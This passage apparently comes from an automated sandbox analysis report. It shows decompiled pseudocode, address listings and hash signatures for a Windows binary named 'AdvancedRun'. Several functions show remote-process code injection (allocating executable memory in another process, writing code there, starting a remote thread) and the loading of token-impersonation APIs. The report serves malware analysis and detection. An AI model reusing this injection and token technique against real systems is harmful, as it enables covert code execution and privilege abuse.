                                                                                                        • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                        • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                        • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                        • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                        • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                        • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                        • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                        • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                        • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                        • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                        • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                        • API String ID: 667068680-4280973841
                                                                                                        • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                        • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                        • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                        • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208librarymemoryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 70%
                                                                                                        			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

































                                                                                                        0x0040a474
                                                                                                        0x0040a47b
                                                                                                        0x0040a48a
                                                                                                        0x0040a48d
                                                                                                        0x0040a48f
                                                                                                        0x0040a497
                                                                                                        0x0040a49a
                                                                                                        0x0040a6f7
                                                                                                        0x0040a6f9
                                                                                                        0x0040a700
                                                                                                        0x0040a700
                                                                                                        0x0040a4ad
                                                                                                        0x0040a4b3
                                                                                                        0x0040a4b8
                                                                                                        0x0040a4c6
                                                                                                        0x0040a4cc
                                                                                                        0x0040a4cf
                                                                                                        0x0040a4dd
                                                                                                        0x0040a4e2
                                                                                                        0x0040a4e3
                                                                                                        0x0040a4ea
                                                                                                        0x0040a4e5
                                                                                                        0x0040a4e5
                                                                                                        0x0040a4e5
                                                                                                        0x0040a4ec
                                                                                                        0x0040a4f6
                                                                                                        0x0040a4fe
                                                                                                        0x0040a503
                                                                                                        0x0040a504
                                                                                                        0x0040a50b
                                                                                                        0x0040a506
                                                                                                        0x0040a506
                                                                                                        0x0040a506
                                                                                                        0x0040a50d
                                                                                                        0x0040a512
                                                                                                        0x0040a518
                                                                                                        0x0040a51c
                                                                                                        0x0040a523
                                                                                                        0x0040a523
                                                                                                        0x0040a523
                                                                                                        0x0040a528
                                                                                                        0x0040a537
                                                                                                        0x0040a54c
                                                                                                        0x0040a539
                                                                                                        0x0040a544
                                                                                                        0x0040a549
                                                                                                        0x0040a558
                                                                                                        0x0040a56d
                                                                                                        0x0040a55a
                                                                                                        0x0040a565
                                                                                                        0x0040a56a
                                                                                                        0x0040a579
                                                                                                        0x0040a591
                                                                                                        0x0040a57b
                                                                                                        0x0040a589
                                                                                                        0x0040a58e
                                                                                                        0x0040a5b4
                                                                                                        0x0040a5b7
                                                                                                        0x0040a5cc
                                                                                                        0x0040a5cf
                                                                                                        0x0040a5d4
                                                                                                        0x0040a5d7
                                                                                                        0x0040a6ed
                                                                                                        0x0040a5e5
                                                                                                        0x0040a5fa
                                                                                                        0x0040a60b
                                                                                                        0x0040a61a
                                                                                                        0x0040a620
                                                                                                        0x0040a623
                                                                                                        0x0040a62b
                                                                                                        0x0040a62f
                                                                                                        0x0040a632
                                                                                                        0x0040a659
                                                                                                        0x0040a634
                                                                                                        0x0040a635
                                                                                                        0x0040a641
                                                                                                        0x0040a648
                                                                                                        0x0040a648
                                                                                                        0x0040a668
                                                                                                        0x0040a66e
                                                                                                        0x0040a685
                                                                                                        0x0040a69e
                                                                                                        0x0040a6a8
                                                                                                        0x0040a6ad
                                                                                                        0x0040a6bd
                                                                                                        0x0040a6c5
                                                                                                        0x0040a6c8
                                                                                                        0x0040a6d0
                                                                                                        0x0040a6d1
                                                                                                        0x0040a6d2
                                                                                                        0x0040a6d3
                                                                                                        0x0040a6d3
                                                                                                        0x0040a6c8
                                                                                                        0x0040a6d7
                                                                                                        0x0040a6dc
                                                                                                        0x0040a6dc
                                                                                                        0x0040a6d7
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                        • memset.MSVCRT ref: 0040A4B3
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                          • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                          • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                          • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                          • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                          • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                          • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                        • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                        • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                        • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                        • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                        • memset.MSVCRT ref: 0040A66E
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                        • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                        • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                        • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                        • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                        • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                        • API String ID: 1572607441-20550370
                                                                                                        • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                        • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                        • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                        • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}






                                                                                                        0x004028a3
                                                                                                        0x004028ab
                                                                                                        0x004028bd
                                                                                                        0x004028ca
                                                                                                        0x004028d7
                                                                                                        0x004028e3
                                                                                                        0x004028e6
                                                                                                        0x004028e8
                                                                                                        0x00000000
                                                                                                        0x004028eb
                                                                                                        0x004028ec

                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                        • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                        • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                        • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                        • API String ID: 2238633743-1970996977
                                                                                                        • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                        • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                        • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                        • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70threadinjectionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 64%
                                                                                                        			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}




















                                                                                                        0x0040a27d
                                                                                                        0x0040a286
                                                                                                        0x0040a290
                                                                                                        0x0040a29d
                                                                                                        0x00000000
                                                                                                        0x0040a32f
                                                                                                        0x0040a29f
                                                                                                        0x0040a2a4
                                                                                                        0x0040a2ad
                                                                                                        0x0040a2b6
                                                                                                        0x0040a2bc
                                                                                                        0x0040a2be
                                                                                                        0x0040a2c4
                                                                                                        0x0040a2c8
                                                                                                        0x0040a2ce
                                                                                                        0x0040a2e3
                                                                                                        0x0040a2ed
                                                                                                        0x0040a2fb
                                                                                                        0x0040a2fe
                                                                                                        0x0040a305
                                                                                                        0x0040a30c
                                                                                                        0x0040a30f
                                                                                                        0x0040a313
                                                                                                        0x00000000
                                                                                                        0x0040a31a
                                                                                                        0x0040a338

                                                                                                        APIs
                                                                                                        • GetVersionExW.KERNEL32(?,751468A0,00000000), ref: 0040A290
                                                                                                        • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                          • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                          • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                        • String ID: $
                                                                                                        • API String ID: 283512611-3993045852
                                                                                                        • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                        • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                        • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                        • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                                                        0x00401093
                                                                                                        0x00401096
                                                                                                        0x00401097
                                                                                                        0x0040109b
                                                                                                        0x004010a3
                                                                                                        0x004010a5
                                                                                                        0x00401270
                                                                                                        0x00401278
                                                                                                        0x004012b3
                                                                                                        0x0040127a
                                                                                                        0x00401293
                                                                                                        0x004012a2
                                                                                                        0x004012a2
                                                                                                        0x004012c1
                                                                                                        0x004012d9
                                                                                                        0x004012ea
                                                                                                        0x004012ec
                                                                                                        0x004012f6
                                                                                                        0x00000000
                                                                                                        0x004010ab
                                                                                                        0x004010ab
                                                                                                        0x004010ac
                                                                                                        0x00401231
                                                                                                        0x00401236
                                                                                                        0x00401239
                                                                                                        0x0040123d
                                                                                                        0x00401249
                                                                                                        0x00401249
                                                                                                        0x0040124c
                                                                                                        0x00000000
                                                                                                        0x00401252
                                                                                                        0x00401259
                                                                                                        0x00401265
                                                                                                        0x00000000
                                                                                                        0x00401265
                                                                                                        0x0040123f
                                                                                                        0x0040123f
                                                                                                        0x00401243
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00401243
                                                                                                        0x004010b2
                                                                                                        0x004010b2
                                                                                                        0x004010b5
                                                                                                        0x004011e1
                                                                                                        0x004011e3
                                                                                                        0x004011e6
                                                                                                        0x0040120e
                                                                                                        0x00401216
                                                                                                        0x00000000
                                                                                                        0x0040121c
                                                                                                        0x00401224
                                                                                                        0x00401226
                                                                                                        0x00401229
                                                                                                        0x00000000
                                                                                                        0x0040122f
                                                                                                        0x00000000
                                                                                                        0x0040122f
                                                                                                        0x00401229
                                                                                                        0x004011e8
                                                                                                        0x004011e8
                                                                                                        0x004011ed
                                                                                                        0x004011fb
                                                                                                        0x00401203
                                                                                                        0x00401203
                                                                                                        0x004010bb
                                                                                                        0x004010bb
                                                                                                        0x004010c0
                                                                                                        0x00401151
                                                                                                        0x0040115a
                                                                                                        0x00401168
                                                                                                        0x0040116b
                                                                                                        0x0040116e
                                                                                                        0x00401170
                                                                                                        0x00401173
                                                                                                        0x00401180
                                                                                                        0x00401182
                                                                                                        0x00401185
                                                                                                        0x004011a4
                                                                                                        0x004011ac
                                                                                                        0x00000000
                                                                                                        0x004011b2
                                                                                                        0x004011ba
                                                                                                        0x004011bc
                                                                                                        0x004011c7
                                                                                                        0x004011c9
                                                                                                        0x004011cb
                                                                                                        0x00000000
                                                                                                        0x004011d1
                                                                                                        0x00000000
                                                                                                        0x004011d1
                                                                                                        0x004011cb
                                                                                                        0x00401187
                                                                                                        0x00401187
                                                                                                        0x00401199
                                                                                                        0x00000000
                                                                                                        0x00401199
                                                                                                        0x004010c6
                                                                                                        0x004010c8
                                                                                                        0x004012fd
                                                                                                        0x004012fd
                                                                                                        0x004012fd
                                                                                                        0x004010ce
                                                                                                        0x004010ce
                                                                                                        0x004010d7
                                                                                                        0x004010e5
                                                                                                        0x004010e8
                                                                                                        0x004010eb
                                                                                                        0x004010ed
                                                                                                        0x004010f0
                                                                                                        0x00401102
                                                                                                        0x0040111d
                                                                                                        0x00401125
                                                                                                        0x00000000
                                                                                                        0x0040112b
                                                                                                        0x00401133
                                                                                                        0x00401135
                                                                                                        0x00401140
                                                                                                        0x00401142
                                                                                                        0x00401144
                                                                                                        0x00000000
                                                                                                        0x0040114a
                                                                                                        0x0040114a
                                                                                                        0x00000000
                                                                                                        0x0040114a
                                                                                                        0x00401144
                                                                                                        0x00401104
                                                                                                        0x0040110a
                                                                                                        0x0040110b
                                                                                                        0x0040110b
                                                                                                        0x0040110e
                                                                                                        0x00401115
                                                                                                        0x00401117
                                                                                                        0x00401117
                                                                                                        0x00401102
                                                                                                        0x004010c8
                                                                                                        0x004010c0
                                                                                                        0x004010b5
                                                                                                        0x004010ac
                                                                                                        0x00401303

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                        • String ID: AdvancedRun
                                                                                                        • API String ID: 829165378-481304740
                                                                                                        • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                        • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                        • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
